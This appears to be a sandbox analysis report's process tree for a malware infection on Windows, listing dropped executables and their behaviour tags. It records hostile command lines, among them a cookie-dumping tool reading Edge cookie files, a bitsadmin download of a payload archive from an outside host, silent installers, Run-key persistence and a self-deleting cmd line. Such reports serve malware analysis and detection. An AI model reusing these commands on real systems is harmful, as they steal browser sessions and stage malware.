C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\Documents\rJDFkFv9mmHHWASOw8beydwV.exe"C:\Users\Admin\Documents\rJDFkFv9mmHHWASOw8beydwV.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\rJDFkFv9mmHHWASOw8beydwV.exe"C:\Users\Admin\Documents\rJDFkFv9mmHHWASOw8beydwV.exe"3⤵
- Drops file in Drivers directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d5647185⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4756 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5372 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5352 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5916 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6596 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6596 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5476 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6880 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3156 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4928 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5652 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6996 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1068 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5572 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5532 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5976 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5624 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5544 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4880 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7136 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7288 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7304 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7544 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7208 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7072 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1720 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7380 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7416 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7832 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2196,3585815263549903343,11994111954148778227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4800 /prefetch:85⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 6676 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\rJDFkFv9mmHHWASOw8beydwV.exe"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 66765⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 6676 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\rJDFkFv9mmHHWASOw8beydwV.exe"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 66765⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Kills process with taskkill
-
C:\Users\Admin\Documents\gw4IdvE5G_HLuaXzgZeN_Zqp.exe"C:\Users\Admin\Documents\gw4IdvE5G_HLuaXzgZeN_Zqp.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z3⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pXd6xLoKVfw7mBXV -y x C:\zip.7z -o"C:\Program Files\temp_files\"3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ptZ6g68Nm4l7O2bj -y x C:\zip.7z -o"C:\Program Files\temp_files\"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\itLdAUYMscN\itLdAUYMscN.dll" itLdAUYMscN3⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\itLdAUYMscN\itLdAUYMscN.dll" itLdAUYMscN4⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw2504.tmp\tempfile.ps1"3⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT3⤵
-
C:\Users\Admin\Documents\kDEcdwOxWvP_PYOYppAsUgAi.exe"C:\Users\Admin\Documents\kDEcdwOxWvP_PYOYppAsUgAi.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-KG51M.tmp\kDEcdwOxWvP_PYOYppAsUgAi.tmp"C:\Users\Admin\AppData\Local\Temp\is-KG51M.tmp\kDEcdwOxWvP_PYOYppAsUgAi.tmp" /SL5="$20240,138429,56832,C:\Users\Admin\Documents\kDEcdwOxWvP_PYOYppAsUgAi.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-V7GCN.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-V7GCN.tmp\Setup.exe" /Verysilent4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"5⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849039 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4391711.exe"C:\Users\Admin\AppData\Roaming\4391711.exe"6⤵
- Executes dropped EXE
-
